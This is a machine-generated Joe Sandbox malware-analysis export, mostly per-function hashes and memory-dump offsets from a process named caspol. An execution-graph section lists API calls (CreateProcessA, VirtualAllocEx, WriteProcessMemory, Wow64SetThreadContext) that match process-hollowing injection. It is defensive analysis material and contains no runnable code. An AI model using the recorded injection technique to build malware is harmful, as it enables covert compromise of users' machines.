• Instruction Fuzzy Hash: 12216D755083809FCB06CF24D994B11BFB1EB46714F29C5EAD8498F266C33A985ACB62
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: afeac17025fe957e858b20e96482b2ce3635190296a16912fdf0d36cfcebbd81
• Instruction ID: 9351e49b637bd7eb2cd7ba8c8c8b59c87e908a74d24f72e6d9900398193bde2e
• Opcode Fuzzy Hash: afeac17025fe957e858b20e96482b2ce3635190296a16912fdf0d36cfcebbd81
• Instruction Fuzzy Hash: 7821C438E09218DFCB60CFA4C898BECBBB5AF89314F24A199940DA7255D7315A82CF40
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e792cee827ca20eea1b5dc3722b5dbf5234d188ab79e83d173bc6478187a4122
• Instruction ID: d38dfd2a0281af9ee9f9198f0e223bdeb3bf7093e9552401b14136436607d6dc
• Opcode Fuzzy Hash: e792cee827ca20eea1b5dc3722b5dbf5234d188ab79e83d173bc6478187a4122
• Instruction Fuzzy Hash: 19214FB8D09259DFCB00DFE4E8999EDBBB5FF89310F20912AE806AB755D7305846DB00
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d77d10b4ce8824dca088f8f63361fe263faea9f1b236d13c1d7f652a1d0c69f2
• Instruction ID: c245d643e87d334c63ded18c511f7ddf6779923361873f940101a6572d649389
• Opcode Fuzzy Hash: d77d10b4ce8824dca088f8f63361fe263faea9f1b236d13c1d7f652a1d0c69f2
• Instruction Fuzzy Hash: 69112E74945218DFDB60CF54C848BE8BBB8AB59300F20A0DDD54EB7280D7719AC2CF40
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3f8884d733d351f98aa8d3c590e845b4040d116df599b17ae661c470991f2c1
• Instruction ID: 473336710e68b0d9471c44a00cca1c5ae9b071631b59b1300f0462790abf036b
• Opcode Fuzzy Hash: c3f8884d733d351f98aa8d3c590e845b4040d116df599b17ae661c470991f2c1
• Instruction Fuzzy Hash: FF11E678D09209DFCB40DFA9D4556EEFFF1AB8A304F2491AAC859A3355D7304A02CF91
Memory Dump Source
• Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
• Instruction ID: 6f3c2b5aeb1ca76e727443e0bed775e69620a83046e9d1ba6b13e4deeb447383
• Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
• Instruction Fuzzy Hash: 77118B75904280DFDB12CF14D5C4B16BBA1FB84314F28CAADD8498B656C33AD85ACBA1
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ef731be43d8faf4ddd09d2933230e612194b899599d25d01f552c6681105520
• Instruction ID: a65477bb39ce0a63aedc195a6787c82431502f494ec106c142020f54ef6b3ea6
• Opcode Fuzzy Hash: 6ef731be43d8faf4ddd09d2933230e612194b899599d25d01f552c6681105520
• Instruction Fuzzy Hash: 84111F38905214CFDB64CF54C598BE8BBF9AB4A315F24A4DEC44D67292C7319E86CF10
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1498899f971e4d27bfd8e6e9efe1f1721a87c0b8153a8c8a7156bb05198b6c89
• Instruction ID: 3e79a1ce9d97980514b0991633cd3afe1ddce9213ece41a53993850b5a10367e
• Opcode Fuzzy Hash: 1498899f971e4d27bfd8e6e9efe1f1721a87c0b8153a8c8a7156bb05198b6c89
• Instruction Fuzzy Hash: C91190B8D0420ADFCB44DFA9D5596AEFBF5BB89300F2490AAC819A3354E7305A41CF91
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 95cbd5a55d2a851866a1fb1c5671f8f6a817e3e2901860a1686af9522076fe02
• Instruction ID: 41f901b82b9f1d9b535ed1f62613735a60a87f0364295bbd1c1241108773dae0
• Opcode Fuzzy Hash: 95cbd5a55d2a851866a1fb1c5671f8f6a817e3e2901860a1686af9522076fe02
• Instruction Fuzzy Hash: DF11ED75A45218DFDB60CF54CC84BE8BBB8AB59300F24A0DDD50EB7280D7719A85CF10
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbd249e56f57bae1f0739bf3362acab5fb9d10e85fc1d772d660e94226992fc9
• Instruction ID: efe32f0cf0555ea92d77db9784f8b3d21d971a55f5daf4eada84b692dae04aff
• Opcode Fuzzy Hash: bbd249e56f57bae1f0739bf3362acab5fb9d10e85fc1d772d660e94226992fc9
• Instruction Fuzzy Hash: DE112774908228CFCB65DF64C889BECBBF5AB49300F1450D9D40EAB282CB304AC8CF10
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d1d6ed959e8837fd88e5999da550262cbfc0b7112678b8e51c3adcf49de65f5
• Instruction ID: 35039bdef1f91e43458b8306d1cce85bb9016c7c11ecadb9a7f2c27dd8966e88
• Opcode Fuzzy Hash: 8d1d6ed959e8837fd88e5999da550262cbfc0b7112678b8e51c3adcf49de65f5
• Instruction Fuzzy Hash: 8B012C79944218DFDB20CF50CC84BECBBB8AB19300F24A1D9D50DB7281D7706A85CF40
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bf53fc14498f9132c2b50c8f5d09e83f440d3fb8f1844db15bfe39f11c41031
• Instruction ID: 04159d2e2256ec381dbb1aadc603ce17ea3fcd7adf0f178115a83465e5b17081
• Opcode Fuzzy Hash: 6bf53fc14498f9132c2b50c8f5d09e83f440d3fb8f1844db15bfe39f11c41031
• Instruction Fuzzy Hash: 2C014074E082549FCB51CB64CC98ADCBFB1BF4A304F2490EAD509AB246C7315A41CF00
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f1872726b76249f8223c19ddff863a17bb734360c263cb7b3021177b6dee530
• Instruction ID: 66b449cccb58f9ee37dc917dffbfa8d7b06c7390a0bf2365decd7a5ddc2430d7
• Opcode Fuzzy Hash: 8f1872726b76249f8223c19ddff863a17bb734360c263cb7b3021177b6dee530
• Instruction Fuzzy Hash: 8E011935905228CFCF60CFA0C954BEDBBB9AB49304F2460DD940DA7251C2329A86DF41
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a4f4a39d3f92b9f3eab4cd96a5495790c7a793453e2256bd873da7bf33ab284
• Instruction ID: 8396fe7f2c964e03c368fbb0a8411dfe49fd4bdc57c636012e89798ba7edb717
• Opcode Fuzzy Hash: 4a4f4a39d3f92b9f3eab4cd96a5495790c7a793453e2256bd873da7bf33ab284
• Instruction Fuzzy Hash: 9D014934D18354CFC715CB24C8586ECBBB5BB46311F1895DA885DA72D2D7304946CF54
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee275ef3d3171bf1b0926675fabe0e0f5e1ab007d5812f51b7edb6fb05ed1477
• Instruction ID: 827ab6428d7b5dc54355c8cb8ec84f5443565f5c2c304b0475fadf3425875783
• Opcode Fuzzy Hash: ee275ef3d3171bf1b0926675fabe0e0f5e1ab007d5812f51b7edb6fb05ed1477
• Instruction Fuzzy Hash: DFF0F474E00209AFCB40DFB9C9846AEFBF5EB49304F1495AAC858E3310E7319A01CB80
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 79cc22a590553122f8e64a9d8461da243e43e16e6b2ccae979969c0146577e07
• Instruction ID: c94840ca7f118adf5b9ab02f490be006de6ce71e5553bc56b458bb7a51f87aa9
• Opcode Fuzzy Hash: 79cc22a590553122f8e64a9d8461da243e43e16e6b2ccae979969c0146577e07
• Instruction Fuzzy Hash: D5F06770D08688DFC705DFA8E8582ACBFB5BB4B301F1491DAC448AB392D7340A41DF48
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d14c750d1c3819a132cc99795d93dfb57140e360d5b56fa5137896f74a150c50
• Instruction ID: 31227dc244d798556d9b033d57ff3bf075a5761ff8a55fe7196d7f74583b407a
• Opcode Fuzzy Hash: d14c750d1c3819a132cc99795d93dfb57140e360d5b56fa5137896f74a150c50
• Instruction Fuzzy Hash: 7301AB75940228AFDBA4DF54C895BD8BBF5EB48315F2080D9D60DA7280DB319F88CF50
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41869b99659cc77f4f460405531c894483e96febc6337a01027dced55ac908c9
• Instruction ID: 6f4895f1468f9a3c7b96107e2e4cbdef0d4646bbe6fd7e570d47bfb595ae6fdd
• Opcode Fuzzy Hash: 41869b99659cc77f4f460405531c894483e96febc6337a01027dced55ac908c9
• Instruction Fuzzy Hash: 06F0E530D05209DFCB44DFB8D9586ADBBB9FB4E301F1091A9C409A3355D7345A41DF48
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b75171516dcb1f91180b92ad34874da39021579a8f2fddb2a7ed288567e86ad9
• Instruction ID: 6bfb669c3f738728e3227fa7477ce3472fbabf290da340992e22094f7e25cbc3
• Opcode Fuzzy Hash: b75171516dcb1f91180b92ad34874da39021579a8f2fddb2a7ed288567e86ad9
• Instruction Fuzzy Hash: 06F03034A593989FCB15DF78D86468C7FF0AF4A201F1541EEC845D72A2D6349958CF02
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c1604a109113eb85f674aaeaed05cf5c65a207d68fee39ca8fd4ac6a1581c15
• Instruction ID: 83064a40efd2efc26f4aedee483b86a78ed5fc5e877bd9f8cc7ba32dfdfe7da2
• Opcode Fuzzy Hash: 4c1604a109113eb85f674aaeaed05cf5c65a207d68fee39ca8fd4ac6a1581c15
• Instruction Fuzzy Hash: 54E09230D193849FDB01DBBCD46538CBFB09B07601F1841EEC88497352D2300A44CB52
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a8738301dfc969aa68eca4044f1b4b638f1083838f548c967ed6e5d9f639d30
• Instruction ID: cd10acee564217a3baa8a86ecf9b5f12414012c3d228b0af0c5ae5b2d0ea9544
• Opcode Fuzzy Hash: 6a8738301dfc969aa68eca4044f1b4b638f1083838f548c967ed6e5d9f639d30
• Instruction Fuzzy Hash: 8AE01A7084D2449FDB05DBB8986879CBF70EB97305F2451DEC48567292C2341956DB52
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2f63333fe6420184b9630dcecaf8fdbf24f66637285fe47db88ab279c60bfde
• Instruction ID: 49039f9c45ad8e01d751a74fba96d3810bc4e660e5d2c7c8847082e219d9619c
• Opcode Fuzzy Hash: b2f63333fe6420184b9630dcecaf8fdbf24f66637285fe47db88ab279c60bfde
• Instruction Fuzzy Hash: EBE0C26090A2885FD302CBBCA921B6C7F345B83208F1400DAC4449B2A2C6200E04DB21
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49809b77f41500d363c5d2b9eef99be4ef3558aa5f5c61c39d7288617b966a62
                                                                      • Instruction ID: 43013e128f1f2b0967e08730b0f3c37ab53a2fa683e23bbbd31f2af287fd62ab
                                                                      • Opcode Fuzzy Hash: 49809b77f41500d363c5d2b9eef99be4ef3558aa5f5c61c39d7288617b966a62
                                                                      • Instruction Fuzzy Hash: 88E0B674910208DFC744DFBCD59865CBBF4AB09305F2041A9D908A7360E6309A54CF81
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91a34ec1680f36835f67c204b131e05fdadb1d09ef3604aedae7418710c45d15
                                                                      • Instruction ID: b3b2bc71882778c22cdfb8c05570ba84906304e45db8708addf44ef61f9cc37a
                                                                      • Opcode Fuzzy Hash: 91a34ec1680f36835f67c204b131e05fdadb1d09ef3604aedae7418710c45d15
                                                                      • Instruction Fuzzy Hash: CFD05E30C09208DBD704DFA8E8647ADBFB8ABC6305F2051A9C84833382C6301E56DB86
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f0e1f6103d8e350dc4c3845bfed820e866f58aa6629e0cd06d8fc50441a70fd
                                                                      • Instruction ID: 8a48c479b794dd3c694c329d87639b274622d452c6f065a188b62c88cb95bbba
                                                                      • Opcode Fuzzy Hash: 3f0e1f6103d8e350dc4c3845bfed820e866f58aa6629e0cd06d8fc50441a70fd
                                                                      • Instruction Fuzzy Hash: D4D0E230D00208ABCB44EFA8E85979CBBB4AB45605F5080A9C808A3280E6305A90CB81
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7dd033048b5f08dc52053363dc37298914da7c3c18e34aa4fae1ec7935a6363
                                                                      • Instruction ID: 0414c373e57043b042df296979f3b36d911c42441b0d575484b8212fec4fc38b
                                                                      • Opcode Fuzzy Hash: d7dd033048b5f08dc52053363dc37298914da7c3c18e34aa4fae1ec7935a6363
                                                                      • Instruction Fuzzy Hash: DCC0127080220DABC714DFADE825B6EBB6CEB82359F0010A9C808232A0DA311E10DBA5

                                                                      Execution Graph

                                                                      Execution Coverage:14.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:131
                                                                      Total number of Limit Nodes:13

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003AE597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gP$gP$gP
                                                                      • API String ID: 963392458-345057509
                                                                      • Opcode ID: ad7b770c114c44f4000f20e9ab479d0bceb10e12dde4fed5589629441483e669
                                                                      • Instruction ID: 84a68e42814755705e8be9897cb97c8213c58564ec6357c00cef102f30515ab9
                                                                      • Opcode Fuzzy Hash: ad7b770c114c44f4000f20e9ab479d0bceb10e12dde4fed5589629441483e669
                                                                      • Instruction Fuzzy Hash: 9FC11570D002198FDF25DFA8C845BEEBBB1FB49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003AE597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gP$gP$gP
                                                                      • API String ID: 963392458-345057509
                                                                      • Opcode ID: 94e5fb6fb099885272c2123449be9a6a7b8bf3997be6f8a0b48f17d5ff6c6c17
                                                                      • Instruction ID: 438df2273afbfcd6aefa70f91334365b4b2c59a3e7c99dc5cd762426ae91b021
                                                                      • Opcode Fuzzy Hash: 94e5fb6fb099885272c2123449be9a6a7b8bf3997be6f8a0b48f17d5ff6c6c17
                                                                      • Instruction Fuzzy Hash: 26C11470D002198FDF25DFA8C845BEEBBB1FB49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: d89c1e0bb9f9cff0cf5008c098ae14459eeee5f3eae9a726e687869c376dbb90
                                                                      • Instruction ID: 9e965ba09de45950f71e1f59c9758c0c2d44faeb857c0f3f9a02c347e1c21f59
                                                                      • Opcode Fuzzy Hash: d89c1e0bb9f9cff0cf5008c098ae14459eeee5f3eae9a726e687869c376dbb90
                                                                      • Instruction Fuzzy Hash: B2419BB4D012589FCF00CFA9D984AEEFBB1FB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: fe7897e69e32d189170359f8db6dea0946a63ad654557b5c85c2d2bd63545d95
                                                                      • Instruction ID: 6815619986f62dd1f608ebcb6355eaf0c091ca69a362bcc28b702dbca561891b
                                                                      • Opcode Fuzzy Hash: fe7897e69e32d189170359f8db6dea0946a63ad654557b5c85c2d2bd63545d95
                                                                      • Instruction Fuzzy Hash: 084198B4D002589FCF00CFA9D984AEEFBF1AB49314F24902AE815B7210D375AA45CB64

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: cecf0369e98645f280abc383918f660689242a2731f28f1ac97c0f02419d8b0c
                                                                      • Instruction ID: 1dd5871eef6edba9dcaa5ca14cb6a43385e4c61916f6c6e8c59ab549c7852938
                                                                      • Opcode Fuzzy Hash: cecf0369e98645f280abc383918f660689242a2731f28f1ac97c0f02419d8b0c
                                                                      • Instruction Fuzzy Hash: 3441BCB9D042589FCF10CFA9D984AEEFBB1BF49310F14942AE815B7250C379A946CF64

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: c7f14bb020ef429eb7720981fdc6527c51b60331cd7802d264192f3391497d95
                                                                      • Instruction ID: c08278b670e448a32698247bc244773a986cc2c348d381f81064be863657feb6
                                                                      • Opcode Fuzzy Hash: c7f14bb020ef429eb7720981fdc6527c51b60331cd7802d264192f3391497d95
                                                                      • Instruction Fuzzy Hash: 494199B9D002589FCF10CFA9D984AEEFBB1BB49310F14942AE815B7200D735A945CF64

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003ADEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 9a71a228ce1fd7796a5061df38d214c632252ea5138cc84165bb463547a7f554
                                                                      • Instruction ID: baef16c6532b2abac47c2ebe928a51f4716af7b300c752e37bc77ffcd78761c0
                                                                      • Opcode Fuzzy Hash: 9a71a228ce1fd7796a5061df38d214c632252ea5138cc84165bb463547a7f554
                                                                      • Instruction Fuzzy Hash: 0241AAB8D002589FCF10CFA9D980AEEFBB1AF49310F14941AE815BB314D735A946CF54

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003ADEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: ae40c9ac916b9db82a2362f8855f313095daec7d6288f6a6fadfb402ae1a27b8
                                                                      • Instruction ID: 9690f7798865f3b0d2ebb0209ba92edb10e4e922fac5a9613cfe71a8c4c670d3
                                                                      • Opcode Fuzzy Hash: ae40c9ac916b9db82a2362f8855f313095daec7d6288f6a6fadfb402ae1a27b8
                                                                      • Instruction Fuzzy Hash: 374199B8D002589FCF10CFA9D984AAEFBB1EB49310F10942AE815BB314D735A945CFA5

                                                                      Control-flow Graph

                                                                      control_flow_graph 972 3ad8a1-3ad908 974 3ad90a-3ad91c 972->974 975 3ad91f-3ad96d Wow64SetThreadContext 972->975 974->975 977 3ad96f-3ad975 975->977 978 3ad976-3ad9c2 975->978 977->978
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 003AD957
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 5c6b018e831dd07b45ec3e67a3fd620ceddfefd85f147e863e7bc1a29caa3240
                                                                      • Instruction ID: bc29909c9805f0a0621a59d10c595be73e41af8b944615a83665f93cf7becde5
                                                                      • Opcode Fuzzy Hash: 5c6b018e831dd07b45ec3e67a3fd620ceddfefd85f147e863e7bc1a29caa3240
                                                                      • Instruction Fuzzy Hash: A741BCB5D012589FCF10CFA9D884AEEFFB1AF49314F24842AE855B7244C739AA49CF54

                                                                      Control-flow Graph

                                                                      control_flow_graph 983 3ad8a8-3ad908 985 3ad90a-3ad91c 983->985 986 3ad91f-3ad96d Wow64SetThreadContext 983->986 985->986 988 3ad96f-3ad975 986->988 989 3ad976-3ad9c2 986->989 988->989
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 003AD957
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 36d8eb8dd6cf3ee1334107174d94bfa1615ba0f8d493c60ccebce708b2a46a53
                                                                      • Instruction ID: a190d4df0fb3b038698ac86b92de67671df733909f6ef83568560b8bbc4be91b
                                                                      • Opcode Fuzzy Hash: 36d8eb8dd6cf3ee1334107174d94bfa1615ba0f8d493c60ccebce708b2a46a53
